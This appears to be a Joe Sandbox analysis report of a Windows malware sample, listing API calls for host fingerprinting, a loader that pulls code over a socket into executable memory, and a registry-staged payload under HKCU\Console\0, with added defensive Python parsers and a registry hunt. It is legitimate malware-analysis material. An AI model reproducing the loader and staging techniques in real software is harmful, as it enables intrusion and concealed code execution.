                                                                                    • DeleteObject.GDI32 ref: 0307BFE9
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0307BFF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                    • String ID: ($6$gfff$gfff
                                                                                    • API String ID: 3293817703-713438465
                                                                                    • Opcode ID: 952aa3171e943c09eff1ee0b858e943ef0755318ba86bd6c145429c60828e93c
                                                                                    • Instruction ID: dc1c535542aaf6aa92bf0dc0d3fc7f977c965503d1b18daa7150c12eb72f02b6
                                                                                    • Opcode Fuzzy Hash: 952aa3171e943c09eff1ee0b858e943ef0755318ba86bd6c145429c60828e93c
                                                                                    • Instruction Fuzzy Hash: 13D193B1D02318AFDB10EFE9D885B9EBBB9FF88700F144529F505AB240D774A905CB95
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03075611,0000035E,000002FA), ref: 0307749C
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 030774B2
                                                                                    • swprintf.LIBCMT ref: 030774EF
                                                                                      • Part of subcall function 03077410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03077523), ref: 0307743D
                                                                                      • Part of subcall function 03077410: GetProcAddress.KERNEL32(00000000), ref: 03077444
                                                                                      • Part of subcall function 03077410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03077523), ref: 03077452
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03077547
                                                                                    • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03077563
                                                                                    • RegCloseKey.KERNEL32(000002FA), ref: 03077586
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,03075611,0000035E,000002FA), ref: 03077598
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                    • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                    • API String ID: 2158625971-3190923360
                                                                                    • Opcode ID: 913487d4fbfe8c8f57d50503f1572588e8ba10ce941679bcef4068aa09d54462
                                                                                    • Instruction ID: 68c019ae3f54a8010102cbbda4e02e966af5b666522a68d56a3cb0c8734ab1bf
                                                                                    • Opcode Fuzzy Hash: 913487d4fbfe8c8f57d50503f1572588e8ba10ce941679bcef4068aa09d54462
                                                                                    • Instruction Fuzzy Hash: 0431B875A42309BFDB14EBA4CC45EFF77BCEB48780F140519BA05A6146E674DA04C760
                                                                                    APIs
                                                                                    • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03078132
                                                                                    • lstrcmpiW.KERNEL32(?,A:\), ref: 03078166
                                                                                    • lstrcmpiW.KERNEL32(?,B:\), ref: 03078176
                                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 030781A6
                                                                                    • lstrlenW.KERNEL32(?), ref: 030781B7
                                                                                    • __wcsnicmp.LIBCMT ref: 030781CE
                                                                                    • lstrcpyW.KERNEL32(00000AD4,?), ref: 03078204
                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 03078228
                                                                                    • lstrcatW.KERNEL32(?,00000000), ref: 03078233
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                    • String ID: A:\$B:\
                                                                                    • API String ID: 950920757-1009255891
                                                                                    • Opcode ID: 7ae2a8180253200027cd7efcf9917fe33937754341154d6ae6c15973edd636d4
                                                                                    • Instruction ID: 7410b839442c9bdafe3c640c93471b2bba68cef27f9fc010c922c832d150849e
                                                                                    • Opcode Fuzzy Hash: 7ae2a8180253200027cd7efcf9917fe33937754341154d6ae6c15973edd636d4
                                                                                    • Instruction Fuzzy Hash: 9B419971E0321CABDB60DF65DD45AEEB3BCFF84610F04459AE909A7140EB74DA05CB98
                                                                                    APIs
                                                                                      • Part of subcall function 03075320: InterlockedDecrement.KERNEL32(00000008), ref: 0307536F
                                                                                      • Part of subcall function 03075320: SysFreeString.OLEAUT32(00000000), ref: 03075384
                                                                                      • Part of subcall function 03075320: SysAllocString.OLEAUT32(03095148), ref: 030753D5
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03095148,030769A4,03095148,00000000,75BF73E0), ref: 030767F4
                                                                                    • GetLastError.KERNEL32 ref: 030767FE
                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 03076816
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0307681D
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0307683F
                                                                                    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03076871
                                                                                    • GetLastError.KERNEL32 ref: 0307687B
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 030768E6
                                                                                    • HeapFree.KERNEL32(00000000), ref: 030768ED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                    • String ID: NONE_MAPPED
                                                                                    • API String ID: 1317816589-2950899194
                                                                                    • Opcode ID: 22fae23a5f5ddcc8b09bf2a6b825caab6d85067943ee6222386b340e6e49f2ad
                                                                                    • Instruction ID: 767c358460b52389b205e26be5b4d9b14d296b4e629469df383d345254a47938
                                                                                    • Opcode Fuzzy Hash: 22fae23a5f5ddcc8b09bf2a6b825caab6d85067943ee6222386b340e6e49f2ad
                                                                                    • Instruction Fuzzy Hash: 3141A6B5E0221CAFDB60EB64DC44FEE73BCFBC5700F004599E609AA140DA755A858B68
                                                                                    APIs
                                                                                    • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03076C8B
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03076CAA
                                                                                    • _memset.LIBCMT ref: 03076CE1
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 03076CF4
                                                                                    • swprintf.LIBCMT ref: 03076D39
                                                                                    • swprintf.LIBCMT ref: 03076D4C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                    • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                    • API String ID: 3202570353-3501811827
                                                                                    • Opcode ID: b700f838c6bd153790acbce69e0d87d29b6f42b8b755107eff5d4eb2a636a37d
                                                                                    • Instruction ID: d4a17c42c87cd42077f7ad06b0ab9dfb2d03be895c4a4345305ca75717c08fd9
                                                                                    • Opcode Fuzzy Hash: b700f838c6bd153790acbce69e0d87d29b6f42b8b755107eff5d4eb2a636a37d
                                                                                    • Instruction Fuzzy Hash: BC3161B6E0120CABDB14DFE5CC45FEEB7B9FB88700F50421EE91AAB241D6745905CB94
                                                                                    APIs
                                                                                    • CreateDXGIFactory.DXGI(0309579C,?,2DB1A981,74DEDF80,00000000,75BF73E0), ref: 03076F4A
                                                                                    • swprintf.LIBCMT ref: 0307711E
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 030771C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                    • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                    • API String ID: 3803070356-257307503
                                                                                    • Opcode ID: e0321a8bb4ba9f479615ff0c7064f884bd407f9ec02e734a28a66039ce13db65
                                                                                    • Instruction ID: eec57e5b046cb4de02783557ff2dcd21f33f5598eb34daab7e4aa9b3cd577942
                                                                                    • Opcode Fuzzy Hash: e0321a8bb4ba9f479615ff0c7064f884bd407f9ec02e734a28a66039ce13db65
                                                                                    • Instruction Fuzzy Hash: F0E16571E022259FDF64CE68CC80BFEB3B5BB85740F1445E9D91AA7284D770AE818F94
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040CA7C,?,?), ref: 0040C9EE
                                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040CA7C,?,?), ref: 0040C9F7
                                                                                      • Part of subcall function 0040C86C: FindFirstFileW.KERNEL32(00000000,?,00000000,0040C8CA,?,?), ref: 0040C89F
                                                                                      • Part of subcall function 0040C86C: FindClose.KERNEL32(00000000,00000000,?,00000000,0040C8CA,?,?), ref: 0040C8AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                    • String ID:
                                                                                    • API String ID: 3216391948-0
                                                                                    • Opcode ID: cba53f77fa6c43a58e77711aeefb5a73a992831c97479b4bd05ea56ffe174a68
                                                                                    • Instruction ID: dd154ea817c974e97ef7d73b686066fe5e2276528df8cc7754812583d82bc4d2
                                                                                    • Opcode Fuzzy Hash: cba53f77fa6c43a58e77711aeefb5a73a992831c97479b4bd05ea56ffe174a68
                                                                                    • Instruction Fuzzy Hash: F8116370B00109DBDB00FBA6D982AAEB7B8EF45704F50457FA504B76D2DB385E058B59
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040C8CA,?,?), ref: 0040C89F
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040C8CA,?,?), ref: 0040C8AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 902e23e6e2c558fabe42d0862c9577194d6b3774d660575b183d7f6ebdea202e
                                                                                    • Instruction ID: a79f3244e1dae306cfdd43c11d9e05b1965ff1ec8325b00f92b99aced98e3e72
                                                                                    • Opcode Fuzzy Hash: 902e23e6e2c558fabe42d0862c9577194d6b3774d660575b183d7f6ebdea202e
                                                                                    • Instruction Fuzzy Hash: D8F0B472550608EED710FB79CD9298DBBECEB4431576005B6F400F32D2EA385F00551C

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 004221FC: LoadLibraryA.KERNEL32(?), ref: 004222E4
                                                                                    • VirtualAlloc.KERNEL32(00000000,0001E000,00003000,00000040), ref: 00421E22
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00421E52
                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 00421E5E
                                                                                    • VirtualProtect.KERNEL32(?,00000001,00000040,?), ref: 0042206B
                                                                                    • WriteProcessMemory.KERNEL32(000000FF,?,?,00000064,?), ref: 00422081
                                                                                    • connect.WS2_32(?,?,00000010), ref: 00422098
                                                                                    • recv.WS2_32(?,?,00001000,00000000), ref: 004220BA
                                                                                    • closesocket.WS2_32(?), ref: 004220F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocLibraryLoadMemoryProcessProtectStartupWriteclosesocketconnectrecvsocket
                                                                                    • String ID: -$-$-$.$.$.$.$.$.$.$/$/$/$1$3$5$6$:$R$U$a$a$a$c$c$e$e$e$h$h$i$k$l$m$n$o$o$o$p$p$p$p$r$s$s$s$s$s$s$s$t$t$t$t$u$u$v$w$x$x$y$y
                                                                                    • API String ID: 1908411163-4220177053
                                                                                    • Opcode ID: 0a5c0964fa35a880765474ee3d056f93aba7d148df484ba7d181343147612299
                                                                                    • Instruction ID: 6eba19237a2e4297c06948fbfb06263f303c5671ab06a48b70b181f2cbbdbc92
                                                                                    • Opcode Fuzzy Hash: 0a5c0964fa35a880765474ee3d056f93aba7d148df484ba7d181343147612299
                                                                                    • Instruction Fuzzy Hash: C081FD20D083D8DEEB21C7A8D84CBDDBFB55F12748F184199D1887B282C7FA1589CB66
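The function above is the part of the sample worth reading first: it allocates 0x1E000 bytes with flProtect 0x40 (PAGE_EXECUTE_READWRITE), opens a TCP socket, connects, receives into that buffer in 0x1000-byte reads and re-protects a page before WriteProcessMemory, which is the shape of a loader that stages executable code from the network. The String ID line of single characters is consistent with strings assembled one character at a time on the stack, so the host or path the socket targets does not appear as a plain string. The following triage helper is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own "APIs" bullet lines (copied verbatim below), decodes the VirtualAlloc/VirtualProtect protection argument and raises findings for exactly this pattern, so the same check can be run over every function block of a report. The API name set used as "network" and the finding texts are this example's own choices.

```python
"""Triage helper for the per-function API lists in a Joe Sandbox IDA-plugin report.

Added example, not part of the report: parses the bullet lines of an "APIs" block,
decodes the VirtualAlloc / VirtualProtect protection constants and flags the
loader pattern seen above (RWX allocation + socket recv + WriteProcessMemory).
"""
import re
from dataclasses import dataclass

# One report line, e.g.
#   • VirtualAlloc.KERNEL32(00000000,0001E000,00003000,00000040), ref: 00421E22
#   • Part of subcall function 004221FC: LoadLibraryA.KERNEL32(?), ref: 004222E4
#   • WinExec.KERNEL32 ref: 100112B2            (no argument list in the report)
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

PAGE_EXECUTE_READWRITE = 0x40          # flProtect / flNewProtect value for RWX memory
MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000   # 0x3000 in the report = both
NETWORK_APIS = {"WSAStartup", "socket", "connect", "recv", "send", "closesocket",
                "InternetReadFile", "HttpSendRequestA", "HttpSendRequestW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # raw hex strings; '?' means the sandbox could not resolve the value
    ref: int            # address of the call site
    subcall: bool       # True when the report marks it "Part of subcall function"


def parse_api_lines(text: str) -> list:
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_LINE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


def hex_arg(args: list, index: int):
    """Argument `index` as an int, or None if it is absent or unresolved ('?')."""
    try:
        return int(args[index], 16)
    except (IndexError, ValueError):
        return None


def rwx_regions(calls: list) -> list:
    """(call site, size) for every VirtualAlloc/VirtualProtect asking for PAGE_EXECUTE_READWRITE."""
    out = []
    for c in calls:
        # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
        if c.name == "VirtualAlloc" and hex_arg(c.args, 3) == PAGE_EXECUTE_READWRITE:
            out.append((c.ref, hex_arg(c.args, 1)))
        # VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect)
        elif c.name == "VirtualProtect" and hex_arg(c.args, 2) == PAGE_EXECUTE_READWRITE:
            out.append((c.ref, hex_arg(c.args, 1)))
    return out


def triage(text: str) -> dict:
    calls = parse_api_lines(text)
    names = {c.name for c in calls}
    rwx = rwx_regions(calls)
    findings = []
    if rwx and "recv" in names:
        findings.append("RWX memory plus socket recv: payload staged from the network into executable memory")
    if "WriteProcessMemory" in names:
        findings.append("WriteProcessMemory: code copied into a process image after VirtualProtect")
    if any(c.subcall for c in calls if c.name == "LoadLibraryA"):
        findings.append("LoadLibraryA in a helper: imports likely resolved at run time")
    return {"calls": len(calls), "rwx": rwx,
            "network": sorted(names & NETWORK_APIS), "findings": findings}


# The "APIs" block of the loader function above, copied from the report.
LOADER_APIS = """
  • Part of subcall function 004221FC: LoadLibraryA.KERNEL32(?), ref: 004222E4
• VirtualAlloc.KERNEL32(00000000,0001E000,00003000,00000040), ref: 00421E22
• WSAStartup.WS2_32(00000202,?), ref: 00421E52
• socket.WS2_32(00000002,00000001,00000000), ref: 00421E5E
• VirtualProtect.KERNEL32(?,00000001,00000040,?), ref: 0042206B
• WriteProcessMemory.KERNEL32(000000FF,?,?,00000064,?), ref: 00422081
• connect.WS2_32(?,?,00000010), ref: 00422098
• recv.WS2_32(?,?,00001000,00000000), ref: 004220BA
• closesocket.WS2_32(?), ref: 004220F0
"""

if __name__ == "__main__":
    for key, value in triage(LOADER_APIS).items():
        print(f"{key}: {value}")
```

Paste any other "APIs" block from the report into triage() to compare; a '?' argument (unresolved by the sandbox) is treated as unknown rather than as zero, so a VirtualProtect whose protection the sandbox could not resolve is not counted as RWX.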

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02715507
                                                                                    • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 0271552E
                                                                                    • _memset.LIBCMT ref: 02715548
                                                                                    • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02715563
                                                                                    • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02715586
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 027155B1
                                                                                    • VirtualFree.KERNEL32(02EF0000,00000000,00008000), ref: 02715605
                                                                                    • _memset.LIBCMT ref: 02715669
                                                                                    • _memset.LIBCMT ref: 0271568D
                                                                                    • _memset.LIBCMT ref: 0271569F
                                                                                    • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02715726
                                                                                    • RegCreateKeyW.ADVAPI32 ref: 02715799
                                                                                    • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 027157AC
                                                                                    • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 027157C4
                                                                                    • RegCloseKey.KERNEL32(?), ref: 027157CE
                                                                                    • Sleep.KERNEL32(00000BB8), ref: 027157FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                    • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                    • API String ID: 354323817-737951744
                                                                                    • Opcode ID: 4b56201cd74373a350aa24d4a147e81e3e950b7de695743294cf7239fc44a0fd
                                                                                    • Instruction ID: 1f60f021ab1c6ac61a6ee09cd89131c4cdc5adf8dc9a64b755a71407e3bf1bbb
                                                                                    • Opcode Fuzzy Hash: 4b56201cd74373a350aa24d4a147e81e3e950b7de695743294cf7239fc44a0fd
                                                                                    • Instruction Fuzzy Hash: D891F5B5A40214AFE725DF68DC85FAAB7BEFF84700F408559F909AB240D7B09A44CF91
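The function above opens HKCU (0x80000001) \Console\0 with KEY_READ (0x20019), queries a REG_BINARY value (type 3) named 9e9e85e05ee16fc372a0c7df6549fbd4, copies it into a 0x311BF-byte PAGE_EXECUTE_READWRITE allocation, and later re-creates the key, deletes the value and writes a 0x65-byte REG_BINARY value of the same name back. A Console\0 subkey with hex-named binary values is therefore the host artifact to hunt for; real Console subkeys are named after the console host (for example %SystemRoot%_system32_cmd.exe). The following hunt is an added example, not part of the report or of the sample: it parses a registry export such as the output of `reg export HKCU\Console console.reg` (Windows writes that file as UTF-16LE, so read it with that encoding before passing the text in) and reports every REG_BINARY value with a 32-character hex name directly under HKCU\Console\<digits>. The export text is constructed for the demo; the two value names are the ones in the report, the byte contents are placeholders.

```python
"""Hunt for registry-staged payloads of the kind the function above reads and rewrites.

Added example, not part of the report. Parses a .reg export and flags REG_BINARY values
whose name is a 32-character hex string stored directly under HKCU\\Console\\<digits>.
"""
import re

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
HEX_NAME = re.compile(r"^[0-9a-fA-F]{32}$")                                    # e.g. 9e9e85e05ee16fc372a0c7df6549fbd4
STAGING_KEY = re.compile(r"^HKEY_CURRENT_USER\\Console\\\d+$", re.IGNORECASE)   # Console\0 as in the report


def parse_reg_export(text: str) -> list:
    """Return (key, value name, raw data) triples, joining backslash-continued hex lines."""
    lines = text.splitlines()
    key, i, values = None, 0, []
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        data = m.group("data")
        while data.endswith("\\") and i < len(lines):   # hex data wraps with a trailing backslash
            data = data[:-1] + lines[i].strip()
            i += 1
        values.append((key, m.group("name"), data))
    return values


def decode_value(data: str):
    """Map .reg syntax to (type name, decoded value); 'hex:' is REG_BINARY, the type 3 the loader queries."""
    if data.startswith("hex:"):
        return "REG_BINARY", bytes.fromhex(data[4:].replace(",", ""))
    if data.startswith("dword:"):
        return "REG_DWORD", int(data[6:], 16)
    if data.startswith('"') and data.endswith('"'):
        return "REG_SZ", data[1:-1]
    return "OTHER", data


def find_staged_payloads(text: str) -> list:
    hits = []
    for key, name, data in parse_reg_export(text):
        rtype, value = decode_value(data)
        if STAGING_KEY.match(key) and HEX_NAME.match(name) and rtype == "REG_BINARY":
            hits.append({"key": key, "value": name, "size": len(value), "head": value[:4].hex()})
    return hits


# Constructed export for the demo: the value names come from the report, the bytes are placeholders.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Console]
"ColorTable00"=dword:000c0c0c

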